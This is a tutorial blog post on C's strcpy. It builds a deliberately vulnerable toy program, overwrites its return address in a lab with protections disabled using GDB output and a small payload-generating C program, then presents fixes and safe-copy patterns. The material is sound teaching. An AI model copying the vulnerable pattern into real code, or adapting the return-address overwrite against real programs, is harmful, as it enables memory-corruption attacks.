How Dangerous Is `strcpy` Really?

Published: 5/6/2025

Overview
Bad Use of strcpy
Exploiting a Buffer Overflow
Fixing the Buffer Overflow
But Is It Really Fixed?
Conclusion

Overview

If you have done any amount of programming in C, you have most likely heard that you shouldn't use functions like strcpy, strcat, sprintf, etc., because they are unsafe and easily susceptible to buffer overflow attacks. While that is true, and fantastic advice for new programmers, these functions are like any dangerous tool: in the hands of a trained professional, there isn't much to worry about. When talking about C/C++, people like to bring up how easy it is to shoot yourself in the foot. In this analogy, functions like strcpy are merely the gun; the programmer is the one who pulls the trigger. Handled and used properly, a firearm doesn't hurt anyone, and the same goes for functions like strcpy: used correctly, they can't cause buffer overflows. In this blog post, we take a look at how buffer overflows are exploited when functions like strcpy are used without the proper safety mechanisms, as well as how to use said functions properly to prevent buffer overflows.

Bad Use of `strcpy`

Let's assume we have a simple C program that takes in a filename as input, reads in that file, and then determines if the contents of that file are a string.

NOTE: The following code to check if an unsigned char array is a string is just for demonstration purposes and has been overly simplified for brevity.

Here is what such a program could look like:


#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char *loadfile(const char *filename, size_t *size)
{
    /* Code to read in a file */
}

int is_uchar_str(unsigned char *data)
{
    char tmp[20];
    strcpy(tmp, (char *) data);
    return isalpha(tmp[0]);
}

int main(int argc, char **argv)
{
    unsigned char *data = NULL;
    size_t size = 0;

    if (argc < 2)
    {
        printf("Usage: %s \n", argv[0]);
        return EXIT_FAILURE;
    }

    data = loadfile(argv[1], &size);
    if (data == NULL)
        return EXIT_FAILURE;

    if (is_uchar_str(data))
        printf("String: %s\n", (char *) data);
    else
        printf("%s is binary\n", argv[1]);

    free(data);
    return EXIT_SUCCESS;
}

For brevity's sake, I have omitted the code to handle the reading in of the file. However, let us assume that the function is not susceptible to any sort of buffer overflow attack. If you haven't already found the buffer overflow, it's these lines right here:


char tmp[20];
strcpy(tmp, (char *) data);

The reason this can cause a buffer overflow is that we are blindly copying data, which has an unknown size, into a fixed-size buffer. If the string in data, counting its terminating null byte, is larger than 20 bytes, strcpy will write past the end of tmp. This is because strcpy does not do any bounds checking to make sure the buffer you are copying into is large enough to hold the incoming data.
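To make the missing bounds check concrete, here is a minimal sketch of what a strcpy-style copy loop does. The name naive_strcpy is made up for illustration, and real C libraries ship optimized implementations rather than this loop, but the contract is the same: keep copying until the terminating null byte, with no knowledge of how large the destination is.

```c
#include <stddef.h>

/* Hypothetical, simplified stand-in for strcpy (not the libc source). */
char *naive_strcpy(char *dest, const char *src)
{
    size_t i = 0;

    /* Copy byte by byte until the terminator; dest's size is never consulted. */
    while (src[i] != '\0')
    {
        dest[i] = src[i];
        i++;
    }
    dest[i] = '\0';
    return dest;
}
```

Nothing in the signature even gives the function a way to learn the size of dest, which is why the caller has to guarantee it.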

However, just because a buffer overflow can occur doesn't mean it will. Let us compile and run our program and see what happens:


$ gcc -g main.c -o main
$ ./main test
Read in 7 bytes from test
String: aaaaaa

Here, we can see we read in a file, test, which contained six a's plus a newline for a total of seven bytes. Even counting the terminating null byte that strcpy copies along with them, that is 8 bytes, and 8 < 20, so there's no way a buffer overflow could happen with this specific file.
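The "Read in 7 bytes from test" line comes from loadfile, whose body was omitted earlier. For readers who want to compile the example themselves, here is a minimal sketch of one way it could be written. This is an assumption, not the original code: it reads the whole file into a heap buffer, appends a null terminator so the contents can be handed to string functions, and prints the byte count in the same format as the output above.

```c
#include <stdio.h>
#include <stdlib.h>

/* Sketch of the omitted loader (an assumption, not the original code).
 * Returns a heap buffer the caller must free, or NULL on any failure. */
unsigned char *loadfile(const char *filename, size_t *size)
{
    FILE *fp = fopen(filename, "rb");
    unsigned char *data = NULL;
    long len;

    if (fp == NULL)
        return NULL;

    /* Determine the file length by seeking to the end and back. */
    if (fseek(fp, 0, SEEK_END) != 0 || (len = ftell(fp)) < 0 ||
        fseek(fp, 0, SEEK_SET) != 0)
    {
        fclose(fp);
        return NULL;
    }

    /* One extra byte so the contents can be treated as a C string. */
    data = malloc((size_t) len + 1);
    if (data == NULL || fread(data, 1, (size_t) len, fp) != (size_t) len)
    {
        free(data);
        fclose(fp);
        return NULL;
    }
    data[len] = '\0';
    fclose(fp);

    *size = (size_t) len;
    printf("Read in %zu bytes from %s\n", *size, filename);
    return data;
}
```

Because the buffer is sized from the file length, the loader itself has no fixed-size buffer to overrun, which matches the assumption made about it above.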

Exploiting a Buffer Overflow

As we discussed in the section above, our example program is vulnerable to a buffer overflow attack.

How It Works

In short, a buffer overflow is what happens when a program writes data to a buffer that goes beyond its allocated space and corrupts surrounding memory. Used maliciously, buffer overflows can be exploited to inject and execute arbitrary code. One of the ways this is done is by overwriting the return address of a function in order to jump to the hacker's injected code and execute it.
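To picture how a write that starts inside a buffer can end up replacing a return address, here is a small simulation. Actually overflowing a stack buffer is undefined behavior, so this sketch models the frame as a plain struct instead. The names fake_frame and unchecked_write are hypothetical, and real frames are laid out by the compiler, not like this struct.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a stack frame. Real frames are laid out by the
 * compiler; this struct only mimics "buffer first, return address later". */
struct fake_frame
{
    char tmp[20];
    char other[20];
    unsigned long return_address;
};

/* Writes n bytes starting at the beginning of tmp with no regard for tmp's
 * size, the way an unchecked copy would. n is capped at the size of the
 * whole struct so the simulation itself stays within valid memory. */
void unchecked_write(struct fake_frame *frame, const void *src, size_t n)
{
    if (n > sizeof(*frame))
        n = sizeof(*frame);
    memcpy(frame, src, n);
}
```

Writing 20 bytes or fewer leaves return_address alone. Writing enough bytes to reach offsetof(struct fake_frame, return_address) and beyond replaces it with whatever the input contains at that position.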

The reason buffer overflow attacks are so dangerous is that any code injected by the hacker will run at the permission level of the program itself. This means if a hacker exploits a program running with root (or administrative) privileges, any arbitrary code they execute will also run with those same privileges. So, if a hacker exploits a buffer overflow in a program running as root and injects code to spawn a reverse shell, the hacker now has free rein to do whatever they please on that system.

In Practice

Let's now assume our example program has a secret function that is never called during normal use, but that we want to execute anyway.


void secret(void)
{
    printf("This should never print\n");
}

If we didn't have the source code to see this function existed, we could still find it by running objdump on our program.


$ objdump -d main
        .
        .
00000000000012a9 <secret>:
    12a9:	f3 0f 1e fa          	endbr64 
    12ad:	55                   	push   %rbp
    12ae:	48 89 e5             	mov    %rsp,%rbp
    12b1:	48 8d 05 50 0d 00 00 	lea    0xd50(%rip),%rax        # 2008 <_IO_stdin_used+0x8>
    12b8:	48 89 c7             	mov    %rax,%rdi
    12bb:	e8 60 fe ff ff       	call   1120 
    12c0:	90                   	nop
    12c1:	5d                   	pop    %rbp
    12c2:	c3                   	ret
        .
        .

Here, we can see that a function named secret exists within our program but is inaccessible to us. Since we know this program is vulnerable to a buffer overflow, we can exploit that buffer overflow in order to have this program run the secret function.

I have also done a couple of preliminary steps to disable common protections such as Address Space Layout Randomization (ASLR) and StackGuard's canary words, among others. Buffer overflows can still be exploited with these protections enabled, but for the sake of simplicity and consistency for this demo, I have disabled them.

Crafting Our Exploit

First, let's run our program through a debugger, like GDB, to get a sense of the memory space and how to craft our exploit.

In GDB, if we run layout src, we can see the function we want to exploit.

[Image: GDB output from running layout src, showing the vulnerable function]

So, let's add a breakpoint at line 58, right before our function returns, and look at the current state of the stack.


(gdb) b 58
Breakpoint 1 at 0x1418: file main.c, line 58.
(gdb) r test
Starting program: /home/main test
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Read in 7 bytes from test

Breakpoint 1, is_uchar_str (data=0x55555555a490 "aaaaaa\n") at main.c:58
58	    return isalpha(tmp[0]);
(gdb) x/32x $rsp
0x7fffffffe2f0:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe300:	0x61616161	0x000a6161	0x00000007	0x00000000
0x7fffffffe310:	0x5555a490	0x00005555	0x555592a0	0x00005555
0x7fffffffe320:	0xffffe350	0x00007fff	0x555554b5	0x00005555
0x7fffffffe330:	0xffffe468	0x00007fff	0x00000000	0x00000002
0x7fffffffe340:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe350:	0x00000002	0x00000000	0xf7c29d90	0x00007fff
0x7fffffffe360:	0x00000000	0x00000000	0x5555543b	0x00005555
(gdb)

What we just did was run the program with our test file and dump the current layout of the stack at our breakpoint. On the line starting with 0x7fffffffe300, we can see our a's, since 0x61 is the ASCII encoding for a in hexadecimal. Looking deeper, we can see that the last two columns of the line starting with 0x7fffffffe320 contain our return address. Because x86-64 is little-endian, the low 32 bits (0x555554b5) are printed before the high 32 bits (0x00005555), so we have to swap the two words to read it, giving a return address of 0x00005555555554b5. How do we know this? We can confirm it by disassembling our main function in GDB with disas main, which gives us this:


        .
        .
0x00005555555554a9 <+110>:	mov    -0x8(%rbp),%rax
0x00005555555554ad <+114>:	mov    %rax,%rdi
0x00005555555554b0 <+117>:	call   0x5555555553f5 <is_uchar_str>
0x00005555555554b5 <+122>:	test   %eax,%eax
0x00005555555554b7 <+124>:	je     0x5555555554d4 <main+153>
0x00005555555554b9 <+126>:	mov    -0x8(%rbp),%rax
        .
        .

We can see that the call to the function we are currently in, is_uchar_str, is at address 0x00005555555554b0, and the next instruction is at address 0x00005555555554b5. A call pushes the address of the instruction that follows it onto the stack, which is how we know from our stack dump that 0x00005555555554b5 is our return address.
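The word swapping needed to read the return address out of the stack dump can be written down as a tiny helper. This is only a sketch; join_words is a made-up name, and it assumes the dump shows 32-bit words on a little-endian machine, as the x/32x output above does.

```c
#include <stdint.h>

/* Rebuilds a 64-bit value from the two 32-bit words that the stack dump
 * prints for it on a little-endian machine: the low half is shown first. */
uint64_t join_words(uint32_t first_word, uint32_t second_word)
{
    return ((uint64_t) second_word << 32) | first_word;
}
```

Feeding it the last two columns of the 0x7fffffffe320 line, 0x555554b5 and 0x00005555, yields 0x00005555555554b5, the address of the instruction right after the call.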

All we have to do now is create a malicious file that overwrites that return address with the address of the secret function. To find this, we can run disas secret:


Dump of assembler code for function secret:
    0x00005555555552a9 <+0>:	endbr64 
    0x00005555555552ad <+4>:	push   %rbp
    0x00005555555552ae <+5>:	mov    %rsp,%rbp
    0x00005555555552b1 <+8>:	lea    0xd50(%rip),%rax        # 0x555555556008
    0x00005555555552b8 <+15>:	mov    %rax,%rdi
    0x00005555555552bb <+18>:	call   0x555555555120 
    0x00005555555552c0 <+23>:	nop
    0x00005555555552c1 <+24>:	pop    %rbp
    0x00005555555552c2 <+25>:	ret    
End of assembler dump.

Here, we can see the address of the secret function is 0x00005555555552a9, so that is what we want to put for our return address in order to execute the secret function.

Going back to the stack dump:


(gdb) x/32x $rsp
0x7fffffffe2f0:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe300:	0x61616161	0x000a6161	0x00000007	0x00000000
0x7fffffffe310:	0x5555a490	0x00005555	0x555592a0	0x00005555
0x7fffffffe320:	0xffffe350	0x00007fff	0x555554b5	0x00005555
0x7fffffffe330:	0xffffe468	0x00007fff	0x00000000	0x00000002
0x7fffffffe340:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe350:	0x00000002	0x00000000	0xf7c29d90	0x00007fff
0x7fffffffe360:	0x00000000	0x00000000	0x5555543b	0x00005555

We can see that there are 40 bytes between the start of our buffer and the return address. In order to generate our malicious file, I wrote a simple C program to generate it for us:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    const size_t off = 0x28; /* Offset in the buffer where the return address is */
    const unsigned long addr = 0x00005555555552a9UL; /* Address of secret */
    char buffer[56]; /* Larger than what we realistically need */
    FILE *badfile;

    /* Initialize buffer with all 'a' */
    memset(buffer, 0x61, sizeof(buffer));

    /* Return address to overwrite (memcpy avoids an unaligned, type-punned store) */
    memcpy(buffer + off, &addr, sizeof(addr));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "wb");
    if (badfile == NULL)
        return EXIT_FAILURE;
    fwrite(buffer, sizeof(buffer), 1, badfile);
    fclose(badfile);
    return EXIT_SUCCESS;
}

NOTE: 0x28 in hexadecimal is 40 in decimal (or base 10).
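One detail worth checking is how much of this payload strcpy will actually copy, since it stops at the first zero byte. The sketch below rebuilds the same payload in memory and reports where that first zero byte falls. The helper name payload_string_length is made up, and the result assumes a little-endian x86-64 target where unsigned long is 8 bytes.

```c
#include <stddef.h>
#include <string.h>

/* Builds the same payload as the generator above into buf and returns how
 * many bytes a str* function would treat as the string, i.e. the index of
 * the first zero byte (or size if there is none). Returns 0 if the address
 * does not fit at the requested offset. */
size_t payload_string_length(unsigned char *buf, size_t size, size_t off,
                             unsigned long addr)
{
    const unsigned char *nul;

    if (off > size || size - off < sizeof(addr))
        return 0;

    memset(buf, 0x61, size);
    memcpy(buf + off, &addr, sizeof(addr));

    nul = memchr(buf, '\0', size);
    return nul != NULL ? (size_t) (nul - buf) : size;
}
```

With a 56-byte buffer, an offset of 0x28, and the address 0x00005555555552a9, the first zero byte is at index 46: the 40 a's and the six non-zero address bytes are copied, and strcpy then writes its own terminator. The overwrite still lands because the top two bytes of the original return address were already zero, so the trailing a's in the file never reach the stack.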

Compiling and running that program, we now have our malicious file that will allow us to exploit the buffer overflow and run the secret function. Let's run it and see what happens.

[Image: successful buffer overflow exploit]

Bada bing bada boom! Our buffer overflow exploit was a success, and the secret function was executed. In case you're curious, the Illegal instruction (core dumped) message appeared because we did not handle what happens after our exploit runs: when secret returns, execution continues at whatever address happens to sit next on the stack, which does not point at valid code. In this basic example, where the program would exit anyway, this doesn't really matter. However, for more sophisticated attacks, properly handling what happens after the exploit would matter.

Fixing the Buffer Overflow

Now that we have proven we can exploit this program via a buffer overflow, how do we fix it? Sure, you could change is_uchar_str to use strncpy, as seen here:


/* Old */
int is_uchar_str(unsigned char *data)
{
    char tmp[20];
    strcpy(tmp, (char *) data);
    return isalpha(tmp[0]);
}
/* New */
int is_uchar_str(unsigned char *data)
{
    size_t size = 20;
    char tmp[size + 1];
    strncpy(tmp, (char *) data, size);
    tmp[size] = '\0'; /* strncpy adds no terminator when data has size or more characters */
    return isalpha(tmp[0]);
}

While that would absolutely fix the problem, the point of this is to show how you can use strcpy and still be safe. The better solution, while still using strcpy, would be to add the size of the incoming data as a parameter. After that, it would be best practice to allocate memory on the heap, rather than creating a fixed-size buffer on the stack. The primary reason for this is that the stack is much more limited in how much memory it can hold compared to the heap. In addition, if you allocate the memory on the heap, the hacker can't simply overrun your buffer and overwrite the return address, like they can in our example, because the return address lives on the stack (heap overflows can still be exploited, just not in this direct way).

With all that in mind, our new function would look something like this:


int is_uchar_str(unsigned char *data, size_t size)
{
    char *tmp = calloc(size + 1, sizeof(char));
    int ret = 0; /* 0 = false */
    if (tmp == NULL)
        return ret;

    strcpy(tmp, (char *) data);
    ret = isalpha(tmp[0]);
    free(tmp);
    return ret;
}

Since we updated our is_uchar_str function by adding an additional parameter, we have to update our main function as well:


int main(int argc, char **argv)
{
    unsigned char *data = NULL;
    size_t size = 0;

    if (argc < 2)
    {
        printf("Usage: %s \n", argv[0]);
        return EXIT_FAILURE;
    }

    data = loadfile(argv[1], &size);
    if (data == NULL)
        return EXIT_FAILURE;

    if (is_uchar_str(data, size))
        printf("String: %s\n", (char *) data);
    else
        printf("%s is binary\n", argv[1]);

    free(data);
    return EXIT_SUCCESS;
}

With these changes, if we recompile the program (even with all the protections disabled), try as we might, we won't be able to perform a buffer overflow:

[Image: program executing as expected after removing the buffer overflow]

Even running our program through Valgrind, we can see we have no memory leaks or errors.

[Image: clean Valgrind output]

But Is It Really Fixed?

In our example, yes; but globally, no. If our is_uchar_str function were part of an API or library, it would technically still be vulnerable to a buffer overflow under the right conditions, namely the same conditions that make strcpy susceptible to a buffer overflow: negligence on behalf of the developer calling it. Let's look at it again:


int is_uchar_str(unsigned char *data, size_t size)
{
    char *tmp = calloc(size + 1, sizeof(char));
    int ret = 0; /* 0 = false */
    if (tmp == NULL)
        return ret;

    strcpy(tmp, (char *) data);
    ret = isalpha(tmp[0]);
    free(tmp);
    return ret;
}

If the developer fails to provide the correct size of the incoming data, a buffer overflow can still occur. However, the same holds true if you use strncpy or strncat, for example, just in reverse.

In our case, if the size is too small, we won't allocate enough space, and strcpy will overflow the buffer. In the case of strncpy and strncat, if the size you give is larger than the buffer you're copying/concatenating into, you can still have a buffer overflow. Granted, the range in which a hacker could overflow the buffer would, in theory, be more limited.
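If is_uchar_str really were part of a library, one way to guard against a caller passing a size that is too small is to confirm that the terminator sits within the claimed length before copying. The following is a sketch under this post's assumption that data holds size bytes followed by a null terminator; the name is_uchar_str_checked is made up for illustration.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Variant of is_uchar_str that refuses to copy unless a terminator is found
 * within the first size + 1 bytes of data. Returns 1 if the first character
 * is alphabetic, 0 otherwise (including on any rejected input). */
int is_uchar_str_checked(const unsigned char *data, size_t size)
{
    char *tmp;
    int ret = 0; /* 0 = false */

    /* Reject NULL, a size that would wrap size + 1, or a string that is
     * longer than the caller claimed. */
    if (data == NULL || size == (size_t) -1 ||
        memchr(data, '\0', size + 1) == NULL)
        return ret;

    tmp = calloc(size + 1, sizeof(char));
    if (tmp == NULL)
        return ret;

    strcpy(tmp, (const char *) data); /* Fits: string length <= size */
    ret = isalpha((unsigned char) tmp[0]) != 0;
    free(tmp);
    return ret;
}
```

The strcpy call is unchanged; the difference is that the function now verifies the precondition itself instead of trusting the caller. A size that is too large is still harmless here, since it only makes the allocation bigger than necessary.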

Conclusion

As we've demonstrated, functions like strcpy, strcat, sprintf, etc., can be used without risking a buffer overflow. However, as with the firearm comparison from the beginning, developers must take the requisite steps to ensure their buffers are large enough to receive any incoming data, which, in fairness, they should be doing anyway. One notable exception would be if you're working within a protocol where messages can only be of a certain length. In that case, yes, using strncpy would make more sense. The counterargument, though, is that if messages can only be, say, 4096 bytes long, you don't even need a bounded copy in the first place. You can just check that the data fits within 4096 bytes before performing strcpy, since anything larger is obviously an invalid message and not worth parsing.

As a final note, whenever you are working in memory-unsafe languages, like C/C++, always verify your buffers are large enough to receive the data you plan to put in them before copying that data in, regardless of whether you are using strcpy or strncpy. If your buffer isn't large enough, either resize it or find another way to handle the exception, such as returning an error code.
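As a closing illustration of that advice, here is a minimal sketch that combines both options: it grows the destination when it is too small and returns an error code when it cannot. The function name copy_with_resize and its calling convention are assumptions made for this example, not part of any standard API.

```c
#include <stdlib.h>
#include <string.h>

/* Copies src into *dst, growing the heap buffer first when it is too small.
 * *dst must be NULL or a pointer obtained from malloc/calloc/realloc, and
 * *cap must hold its current size in bytes. Returns 0 on success and -1 on
 * failure, in which case *dst and *cap are left untouched. */
int copy_with_resize(char **dst, size_t *cap, const char *src)
{
    size_t needed;

    if (dst == NULL || cap == NULL || src == NULL)
        return -1;

    needed = strlen(src) + 1; /* Include the terminator */
    if (needed > *cap)
    {
        char *grown = realloc(*dst, needed);
        if (grown == NULL)
            return -1;
        *dst = grown;
        *cap = needed;
    }

    strcpy(*dst, src); /* Safe: *cap >= strlen(src) + 1 */
    return 0;
}
```

Starting from a NULL pointer with a capacity of 0 works as well, since realloc then behaves like malloc. The caller remains responsible for freeing the buffer.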